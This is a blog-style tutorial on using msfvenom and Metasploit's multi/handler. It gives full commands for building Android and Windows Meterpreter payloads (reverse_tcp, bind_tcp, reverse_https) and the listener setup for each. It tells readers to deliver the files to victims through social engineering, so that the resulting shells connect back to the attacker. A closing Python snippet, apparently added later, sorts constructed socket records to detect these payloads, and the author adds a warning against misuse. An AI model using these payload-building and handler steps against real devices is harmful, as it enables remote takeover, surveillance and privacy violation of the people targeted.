What Is msfvenom? How To Use It?


When it comes to compromising a system, one of the first things a newcomer thinks of is listening to the traffic of a particular machine without being noticed. That requires a payload to be deployed on the target system, and this is where msfvenom comes in. It is a combination of msfpayload and msfencode, it is fast, and it runs as a single instance. msfvenom uses standard command-line options, and it can generate payloads for many platforms, such as Android, Windows, Unix, Node.js and Cisco.


Basically, it is used to generate and output all of the various types of shellcode that are available in Metasploit. There are two prerequisites for following along:

  • Kali Linux
  • Android Phone

Let’s generate a payload for Android devices:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.123.123 lport=xxxx > /home/Desktop/file.apk

Here -p selects the payload, which is specific to the target platform. Meterpreter is the payload that lets us explore the target machine. reverse_tcp is the connection type: the Android device connects back over TCP to our listener. lhost is the IP address of the listening machine, and lport is the port on which that machine listens for the incoming connection from the target. The > redirects the generated payload to the location where it is saved once it’s created.

Once the payload is ready, it has to be transferred to the victim’s Android device and installed. Next, run msfconsole in another terminal:

msfconsole

First, we have to use the multi handler and for that, we have to write:

use exploit/multi/handler

Secondly, we set the payload again:

set payload android/meterpreter/reverse_tcp

Thirdly, we set the lhost:

set lhost 192.168.123.123

Then comes the lport:

set lport xxxx

And finally, we run exploit to start the listener and explore the target device:

exploit

We can generate payloads for Windows as well, and there are three ways to do that:

1. Bind shell

A bind shell is a kind that opens up a new service on the target machine and requires the attacker to connect to it in order to get a session.

Now in terminal, write:

msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe

This will create the payload on your desktop. The payload has to be delivered to the victim machine by some social engineering method and run on that system.

Then we have a set of commands:

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.0.xxx
set lport xxxx
exploit

Once the file is executed on the victim machine, it gives you a Meterpreter session, recognisable by the meterpreter > prompt. The bind_tcp option is helpful if we get disconnected from the victim machine while the payload is still running: we can run the same handler commands again and get the session back without the victim having to run the file again.

2. Reverse TCP Payload

A reverse shell (also known as a connect-back) is the exact opposite: the attacker first sets up a listener on their own machine, the target machine acts as a client connecting to that listener, and the attacker then receives the shell.

Now, we have to generate the payload:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.xxx lport=xxxx -f exe > /root/Desktop/reverse_tcp.exe

Once the payload is generated and sent to the victim for execution, we will start our next step like below:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.xxx
set lport xxxx
exploit

Once the file is executed on the victim machine, it gives you a Meterpreter session, recognisable by the meterpreter > prompt.

3. HTTPS Payload

Now, what if the victim’s network blocks the ports used by the TCP and bind payloads? In that case, the HTTPS port, 443, is usually still open. Let’s create a payload for that. Type:

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.xxx lport=443 -f exe > /root/Desktop/443.exe

Once the payload is generated and sent to the victim for execution, we will start our next step like below:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.xxx
set lport 443
exploit

Once the file is executed on the victim machine, it gives you a Meterpreter session, recognisable by the meterpreter > prompt.
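The three Windows payloads above leave three different footprints on the victim: bind_tcp opens a new listening port, reverse_tcp makes an outbound connection to LHOST:LPORT, and reverse_https makes an outbound connection to 443 that blends in with normal web traffic. The following added example (not part of the original post) triages constructed netstat-style records for those three patterns; the port baselines, process allowlist, port 4444 and the remote address 192.168.0.20 are all assumptions made up for the example.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass(frozen=True)
class Socket:
    """One netstat-style record (constructed format for this example)."""
    state: str        # "LISTEN" or "ESTABLISHED"
    local_port: int
    remote_ip: str    # "" for a listener
    remote_port: int  # 0 for a listener
    process: str      # image name owning the socket

# Constructed baselines for the example host; a real check would take
# these from an inventory of what the machine is supposed to do.
EXPECTED_LISTENERS = {135, 139, 445, 3389}
EXPECTED_OUTBOUND = {53, 80, 443}
WEB_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe"}

def classify(s: Socket) -> Optional[str]:
    """Map one socket to a finding label, or None when it matches the baseline."""
    if s.state == "LISTEN":
        # bind_tcp behaviour: the payload opens a new service and waits to be connected to
        return None if s.local_port in EXPECTED_LISTENERS else "unexpected-listener"
    if s.state == "ESTABLISHED":
        if s.remote_port == 443:
            # reverse_https hides by port alone; only the owning process distinguishes it here
            return None if s.process.lower() in WEB_PROCESSES else "https-from-non-web-process"
        if s.remote_port not in EXPECTED_OUTBOUND:
            # reverse_tcp behaviour: the victim connects out to LHOST:LPORT
            return "outbound-to-unexpected-port"
    return None

def triage(sockets: List[Socket]) -> List[Tuple[str, str]]:
    """Return (process, finding) pairs for every socket that drew a finding."""
    return [(s.process, label) for s in sockets if (label := classify(s))]

# Constructed sample: one record per payload type from the post plus two benign ones.
SAMPLE = [
    Socket("LISTEN", 445, "", 0, "System"),                                 # expected SMB listener
    Socket("LISTEN", 4444, "", 0, "bind.exe"),                              # bind_tcp waiting on LPORT
    Socket("ESTABLISHED", 49710, "192.168.0.20", 4444, "reverse_tcp.exe"),  # reverse_tcp callback
    Socket("ESTABLISHED", 49711, "192.168.0.20", 443, "443.exe"),           # reverse_https callback
    Socket("ESTABLISHED", 49712, "93.184.216.34", 443, "chrome.exe"),       # ordinary browsing
]

if __name__ == "__main__":
    for process, label in triage(SAMPLE):
        print(f"{process}: {label}")
```

The HTTPS case shows why the post's third payload is the hardest to spot: by port it looks like browsing, so the detection has to lean on which process owns the socket rather than on the network tuple alone.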

We can generate payloads for many more systems, as I mentioned above. I request you all not to misuse this knowledge, as doing so may have serious consequences for you. Invading someone’s privacy through digital means is a cybercrime and can lead to imprisonment.


Written by 

Shubham Saini is a DevOps Engineer who loves to play with DevOps tools, Security methods and is also interested in Ethical Hacking & Cyber Security. He is a gamer also.
